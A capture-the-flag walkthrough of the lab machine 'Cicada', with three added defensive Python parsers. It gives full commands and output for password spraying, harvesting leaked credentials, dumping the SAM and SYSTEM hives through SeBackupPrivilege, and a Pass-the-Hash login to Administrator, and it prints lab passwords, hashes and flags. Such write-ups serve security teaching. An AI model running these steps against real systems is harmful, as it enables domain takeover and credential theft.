AI summary: After an Nmap scan of the target IP, the domain `cicada.htb` was discovered and added to hosts. Using `crackmapexec` with the guest user, SMB shares were enumerated successfully; the HR share was found and a default password obtained from it. That password logged in as michael.wrightson, and enumerating users revealed david.orelious's password stored in his account description. david.orelious's password gave access to the DEV share and the Backup_script.ps1 file, which contained emily.oscars's credentials and yielded a shell. emily.oscars's SeBackupPrivilege was then used to export the SAM and SYSTEM hives, extract the Administrator NTLM hash, and finally obtain Administrator via Pass-the-Hash and read the root flag.

Attacker IP: 10.10.16.6
Target IP: 10.10.11.35

nmap -sC -sV -Pn 10.10.11.35
The scan returns the following:

Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 03:54 (0:00:04 remaining)
Nmap scan report for 10.10.11.35
Host is up (0.32s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-26 18:53:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=7/27%Time=68853250%P=aarch64-unknown-linux-gnu%
SF:r(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x82\0\x01\0\0\0\0\0\0\x07ve
SF:rsion\x04bind\0\0\x10\0\x03");
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-26T18:54:52
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -59m46s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.85 seconds

The scan reveals the domain name cicada.htb, so we add it to the hosts file first.

echo "10.10.11.35 cicada.htb" | sudo tee -a /etc/hosts

Let's first check whether an anonymous user can access the SMB shares. We'll use crackmapexec, a popular tool for automatically enumerating a domain (users, files/directories and shares). Let's try to enumerate SMB shares by specifying the protocol, the domain name and the --shares parameter.

crackmapexec smb cicada.htb --shares

Result:

SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

Listing shares without specifying a user is rejected. So perhaps we can try some typical credentials that may be in use, such as the username "guest" with no password.

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

Result:

SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\guest: 
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated shares
SMB         cicada.htb      445    CICADA-DC        Share           Permissions     Remark
SMB         cicada.htb      445    CICADA-DC        -----           -----------     ------
SMB         cicada.htb      445    CICADA-DC        ADMIN$                          Remote Admin
SMB         cicada.htb      445    CICADA-DC        C$                              Default share
SMB         cicada.htb      445    CICADA-DC        DEV                             
SMB         cicada.htb      445    CICADA-DC        HR              READ            
SMB         cicada.htb      445    CICADA-DC        IPC$            READ            Remote IPC
SMB         cicada.htb      445    CICADA-DC        NETLOGON                        Logon server share 
SMB         cicada.htb      445    CICADA-DC        SYSVOL                          Logon server share 

It looks like that worked: the guest user can read the HR share. So we'll use smbclient to browse the share and see what files it may contain.

smbclient //cicada.htb/HR
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:29:09 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 2024

                4168447 blocks of size 4096. 481529 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)

View the contents:

cat Notice\ from\ HR.txt
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Finding SIDs
Now that we have found this password, we can check whether any other accounts are still using it. To do that we need to find all the users in the domain, which we can do with Impacket's lookupsid. This tool brute-forces the Windows Security Identifier (SID) of every principal in the AD domain. Each user has a unique SID, made up of the domain SID with the user's relative identifier (RID) appended. User SIDs are typically issued by a domain controller and used in authorization and access mechanisms, for example as part of the access token created at logon.
To enumerate the domain we specify the guest user, the domain name, and no password.

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

In the output we find the domain's groups, users and aliases, which helps us understand the structure of the whole domain. Our next goal is to extract a user list, so we focus on the entries of type SidTypeUser. To avoid tedious manual filtering, we re-run the command with a couple of extra steps: grep keeps only the lines containing users, and sed strips everything but the username. Finally, the extracted usernames are written to a file named users.txt for later use.

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt

users.txt now contains:

Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
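The grep/sed one-liner above works, but it silently mangles names containing spaces or parentheses and throws away the RID and SID type. The following parser is an added example (not part of the original post) that reads the lookupsid output format shown above, rebuilds each principal's full SID from the domain SID and RID as described in the "Finding SIDs" section, and marks which RIDs are well-known built-ins. The sample input is a constructed subset of the output above; `SidEntry`, `parse_lookupsid` and `user_names` are names chosen here.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: a subset of the impacket-lookupsid output shown above.
SAMPLE_OUTPUT = """\
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\\Administrator (SidTypeUser)
501: CICADA\\Guest (SidTypeUser)
512: CICADA\\Domain Admins (SidTypeGroup)
1000: CICADA\\CICADA-DC$ (SidTypeUser)
1101: CICADA\\DnsAdmins (SidTypeAlias)
1106: CICADA\\michael.wrightson (SidTypeUser)
1109: CICADA\\Dev Support (SidTypeGroup)
1601: CICADA\\emily.oscars (SidTypeUser)
"""

DOMAIN_SID_RE = re.compile(r"^\[\*\] Domain SID is: (S-1-5-21-\d+-\d+-\d+)\s*$")
# One entry per line: "RID: DOMAIN\name (SidTypeXxx)". The name may contain
# spaces ("Domain Admins", "Dev Support"), so it is matched greedily up to the
# final "(SidType...)" group; a plain split on whitespace would break it.
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+) \((SidType\w+)\)\s*$")


@dataclass(frozen=True)
class SidEntry:
    rid: int
    domain: str
    name: str
    sid_type: str
    sid: str  # full SID: the domain SID with "-RID" appended

    @property
    def is_well_known(self) -> bool:
        # RIDs below 1000 are reserved for built-in principals (Administrator=500,
        # Guest=501, krbtgt=502, Domain Admins=512, ...); objects created in the
        # domain after setup get RIDs from 1000 upwards.
        return self.rid < 1000


def parse_lookupsid(output: str) -> List[SidEntry]:
    """Parse lookupsid output into SidEntry records with their full SIDs."""
    domain_sid: Optional[str] = None
    entries: List[SidEntry] = []
    for line in output.splitlines():
        m = DOMAIN_SID_RE.match(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue  # status lines ("[*] ...") and anything else are ignored
        if domain_sid is None:
            raise ValueError("SID entry seen before the 'Domain SID is' line")
        rid = int(m.group(1))
        entries.append(SidEntry(rid, m.group(2), m.group(3), m.group(4), f"{domain_sid}-{rid}"))
    return entries


def user_names(output: str, include_machine_accounts: bool = False) -> List[str]:
    """Equivalent of the grep/sed pipeline: names of SidTypeUser entries only.
    Machine accounts (trailing '$') are dropped unless explicitly requested,
    since they are not human logins."""
    names = []
    for e in parse_lookupsid(output):
        if e.sid_type != "SidTypeUser":
            continue
        if e.name.endswith("$") and not include_machine_accounts:
            continue
        names.append(e.name)
    return names


if __name__ == "__main__":
    for e in parse_lookupsid(SAMPLE_OUTPUT):
        tag = "well-known" if e.is_well_known else "domain-created"
        print(f"{e.sid}  {e.sid_type:<12} {tag:<14} {e.domain}\\{e.name}")
    print("users:", user_names(SAMPLE_OUTPUT))
```

Run it with the real command's output piped in and you get the same user list as the one-liner, plus the full SIDs, which are what appear in Windows security event logs when these principals authenticate.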

Weak passwords
We'll use crackmapexec again, giving it the file of usernames collected earlier and the default password Cicada$M6Corpb*@Lp#nZp!8; crackmapexec will try that password against every user.

crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

It looks like the user michael.wrightson still uses the default password! With valid credentials in hand, we can continue enumerating further.

Enumerating domain users
Michael Wrightson has no access to other accounts, but we can still use his permissions to list the other users on the machine and see whether there is more valuable information to dig up.

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated domain user(s)
SMB         cicada.htb      445    CICADA-DC        cicada.htb\emily.oscars                   badpwdcount: 0 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\david.orelious                 badpwdcount: 0 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3                                                                                                              
SMB         cicada.htb      445    CICADA-DC        cicada.htb\michael.wrightson              badpwdcount: 0 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\sarah.dantelia                 badpwdcount: 1 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\john.smoulder                  badpwdcount: 1 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\krbtgt                         badpwdcount: 1 desc: Key Distribution Center Service Account                                                                                                                          
SMB         cicada.htb      445    CICADA-DC        cicada.htb\Guest                          badpwdcount: 1 desc: Built-in account for guest access to the computer/domain                                                                                                         
SMB         cicada.htb      445    CICADA-DC        cicada.htb\Administrator                  badpwdcount: 1 desc: Built-in account for administering the computer/domain                                                                                                           

We can see that david.orelious stored his own password, aRt$Lp#7t*VQ!3, in his account description.
This helps us with privilege escalation.
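The description attribute is readable by every authenticated domain user, so a password pasted there is effectively public. As an added example (not from the original post), the script below parses the crackmapexec `--users` line format shown above and flags descriptions that look like they carry a credential, the kind of check a domain administrator can run periodically over an export of user descriptions. The sample lines for emily.oscars, david.orelious, krbtgt and Guest mirror the output above; `svc.backup` and `svc.print` are constructed accounts, and the heuristic thresholds in `looks_like_secret` are my own choice.

```python
import re
from typing import List, NamedTuple

# Constructed sample in the line format crackmapexec prints for --users (shown
# above). emily.oscars, david.orelious, krbtgt and Guest mirror the real output;
# svc.backup and svc.print are made-up accounts added to exercise the checks.
SAMPLE_USERS = """\
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated domain user(s)
SMB         cicada.htb      445    CICADA-DC        cicada.htb\\emily.oscars                   badpwdcount: 0 desc: 
SMB         cicada.htb      445    CICADA-DC        cicada.htb\\david.orelious                 badpwdcount: 0 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB         cicada.htb      445    CICADA-DC        cicada.htb\\svc.backup                     badpwdcount: 0 desc: Pwd: Summer2024!
SMB         cicada.htb      445    CICADA-DC        cicada.htb\\svc.print                      badpwdcount: 0 desc: Password rotated quarterly by IT
SMB         cicada.htb      445    CICADA-DC        cicada.htb\\krbtgt                         badpwdcount: 1 desc: Key Distribution Center Service Account
SMB         cicada.htb      445    CICADA-DC        cicada.htb\\Guest                          badpwdcount: 1 desc: Built-in account for guest access to the computer/domain
"""

# "<domain>\<user>   badpwdcount: N desc: <free text>"
USER_LINE_RE = re.compile(r"(\S+)\\(\S+)\s+badpwdcount:\s*(\d+)\s+desc:\s?(.*)$")
KEYWORD_RE = re.compile(r"\b(password|passwd|pwd|pass|credentials?|secret)\b", re.IGNORECASE)


class UserRecord(NamedTuple):
    domain: str
    user: str
    badpwdcount: int
    description: str


class Finding(NamedTuple):
    user: str
    severity: str  # "high": a password-looking token is present; "medium": keyword only
    description: str


def parse_user_lines(output: str) -> List[UserRecord]:
    records = []
    for line in output.splitlines():
        m = USER_LINE_RE.search(line)
        if m:
            records.append(UserRecord(m.group(1), m.group(2), int(m.group(3)), m.group(4).strip()))
    return records


def looks_like_secret(token: str) -> bool:
    """Heuristic for a pasted password: at least 8 characters, contains a digit,
    and uses three or more of the four classes lower/upper/digit/symbol.
    Requiring a digit keeps ordinary words such as "Built-in" out."""
    if len(token) < 8 or not any(c.isdigit() for c in token):
        return False
    classes = sum([
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ])
    return classes >= 3


def find_leaked_descriptions(output: str) -> List[Finding]:
    """Flag accounts whose description field appears to contain a credential."""
    findings = []
    for rec in parse_user_lines(output):
        has_keyword = KEYWORD_RE.search(rec.description) is not None
        has_token = any(looks_like_secret(t) for t in rec.description.split())
        if has_token:
            findings.append(Finding(rec.user, "high", rec.description))
        elif has_keyword:
            findings.append(Finding(rec.user, "medium", rec.description))
    return findings


if __name__ == "__main__":
    for f in find_leaked_descriptions(SAMPLE_USERS):
        print(f"[{f.severity}] {f.user}: {f.description}")
```

A "medium" hit (keyword but no password-looking token) is worth a look but is often harmless text; a "high" hit should be treated as a leaked credential and the password rotated, not just the description cleared.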
First, let's see which shares this user can access.

crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB         cicada.htb      445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         cicada.htb      445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         cicada.htb      445    CICADA-DC        [+] Enumerated shares
SMB         cicada.htb      445    CICADA-DC        Share           Permissions     Remark
SMB         cicada.htb      445    CICADA-DC        -----           -----------     ------
SMB         cicada.htb      445    CICADA-DC        ADMIN$                          Remote Admin
SMB         cicada.htb      445    CICADA-DC        C$                              Default share
SMB         cicada.htb      445    CICADA-DC        DEV             READ            
SMB         cicada.htb      445    CICADA-DC        HR              READ            
SMB         cicada.htb      445    CICADA-DC        IPC$            READ            Remote IPC
SMB         cicada.htb      445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         cicada.htb      445    CICADA-DC        SYSVOL          READ            Logon server share 

It looks like we have access to the DEV share; let's see whether it contains anything useful, again using smbclient.

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 20:31:39 2024
  ..                                  D        0  Thu Mar 14 20:21:29 2024
  Backup_script.ps1                   A      601  Thu Aug 29 01:28:22 2024

                4168447 blocks of size 4096. 455745 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

We can see a PowerShell file, so we download it and view its contents.

┌──(root㉿kali)-[~]
└─# cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

We can see another set of credentials:
Username: emily.oscars
Password: Q!3@Lp#M6b*7t*Vt
We want to use these credentials to try to get a shell, using Evil-WinRM.

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

We have a shell.
By convention, the user flag file should be on her desktop.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/26/2025  11:45 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
7d42adee91a231cf82fd1b0db6f12dc9

User flag: 7d42adee91a231cf82fd1b0db6f12dc9
Next we try to escalate to root (Administrator) to get the root flag.
First, check the current privileges.

whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We find that she has SeBackupPrivilege, a privilege usually granted to service accounts or administrators. It exists to make system backups possible, so it bypasses the normal permission checks and can read files the system otherwise protects.

In short, we can use the registry hives to extract users' NTLM hashes and then authenticate with the Administrator account's hash, bypassing the need for the plaintext password.

Specifically:

  • The SAM (Security Account Manager) registry hive contains the local user accounts and group memberships, including the hashes of user passwords;
  • The SYSTEM hive holds system-wide configuration, including the system boot key used to decrypt the password hashes in SAM.

Next we'll use the reg save command to export these two hives from the registry, giving the corresponding registry paths and saving them as files in the current directory for later analysis.

reg save hklm\sam sam
reg save hklm\system system

Then download both files:

download sam
download system

Now that the files are on our local machine, we can use the secretsdump module from the Impacket toolkit to extract the users' NTLM hashes.
An NTLM hash is a hashed representation of the user's plaintext password. Once we have these hashes we can try to crack them, or use them directly in a Pass-the-Hash attack to authenticate without ever knowing the plaintext password.

To extract the hashes we specify the following parameters:

  • -sam: path to the SAM file, which contains the encrypted password data;
  • -system: path to the SYSTEM file, which contains the boot key needed to decrypt the SAM file;
  • local: indicates that we are working on local files rather than accessing a remote host.

impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
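The `uid:rid:lmhash:nthash:::` lines above carry more than the one hash we need: two of the accounts show the well-known NT hash of an empty password, and every account shows the placeholder LM value that Windows writes when LM storage is disabled. As an added example (not part of the original post), the parser below reads this format and reports empty passwords, stored LM hashes, and accounts that share a password (identical NT hash), which is how a defender would triage a dump like this. The Administrator, Guest and DefaultAccount lines are taken from the output above; `backupadmin` and its LM value are constructed, and `parse_hashdump` / `audit_hashes` are names chosen here.

```python
import re
from typing import Dict, List, NamedTuple

# Well-known constants: the LM field Windows stores when no LM hash is kept (also
# the LM hash of an empty password), and the NT hash of an empty password
# (MD4 of the empty UTF-16LE string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's "uid:rid:lmhash:nthash:::" format. The
# Administrator, Guest and DefaultAccount lines mirror the dump above;
# "backupadmin" is a made-up account with a made-up LM value, added to show the
# LM-storage and hash-reuse checks.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backupadmin:1001:00112233445566778899aabbccddeeff:2b87e7c93a3e8a0ea4a581937016f341:::
[*] Cleaning up...
"""

HASH_LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


class Account(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text: str) -> List[Account]:
    """Keep only well-formed hash lines; status lines ("[*] ...") are skipped."""
    accounts = []
    for line in text.splitlines():
        m = HASH_LINE_RE.match(line.strip())
        if m:
            accounts.append(Account(m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()))
    return accounts


def audit_hashes(accounts: List[Account]) -> Dict[str, List[str]]:
    """Return three lists of usernames:
    empty_password  - NT hash equals the empty-password hash (this format does not
                      show whether the account is disabled; check that separately)
    lm_hash_stored  - a real LM hash is present, i.e. LM storage is not disabled
    shared_nt_hash  - the same non-empty NT hash appears on more than one account,
                      which means those accounts share a password."""
    findings: Dict[str, List[str]] = {"empty_password": [], "lm_hash_stored": [], "shared_nt_hash": []}
    by_nt: Dict[str, List[str]] = {}
    for a in accounts:
        if a.nt == EMPTY_NT:
            findings["empty_password"].append(a.user)
        if a.lm != EMPTY_LM:
            findings["lm_hash_stored"].append(a.user)
        by_nt.setdefault(a.nt, []).append(a.user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].extend(users)
    return findings


if __name__ == "__main__":
    accounts = parse_hashdump(SAMPLE_DUMP)
    for name, users in audit_hashes(accounts).items():
        print(f"{name}: {users or '-'}")
```

The reuse check is the one that matters most after an incident like this one: if the Administrator's NT hash also appears on other local or domain accounts, a single Pass-the-Hash login exposes all of them, so every account sharing the hash needs a new password, not only Administrator.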

In the output we find the Administrator user's NTLM hash: 2b87e7c93a3e8a0ea4a581937016f341
We can log in to that account directly with Evil-WinRM by passing the hash via the -H parameter, i.e. a Pass-the-Hash attack.

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb

The login succeeds, and the rest is simple: grab root.txt, the root flag, from the desktop.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/26/2025  11:45 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
3dd50f0b8cfe331441ee707b710c76e7

Root flag: 3dd50f0b8cfe331441ee707b710c76e7

Last modified: 27 July 2025